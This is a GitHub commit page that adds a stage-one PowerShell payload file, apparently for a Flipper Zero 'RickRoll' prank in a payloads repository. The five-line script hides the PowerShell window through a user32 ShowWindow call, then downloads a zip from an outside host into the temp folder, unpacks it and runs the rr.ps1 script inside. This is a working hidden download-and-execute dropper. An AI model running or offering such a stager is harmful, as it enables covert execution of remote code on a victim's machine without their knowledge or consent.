Skip to content

Commit

Permalink
Create StageOne.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
I-Am-Jakoby authored Aug 29, 2023
1 parent ffae1e9 commit 424e6b2
Showing 1 changed file with 5 additions and 0 deletions.
5 changes: 5 additions & 0 deletions Payloads/Flip-ADV-RickRoll/StageOne.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
add-type -name win -member $i -namespace native;
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);

cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1

0 comments on commit 424e6b2

Please sign in to comment.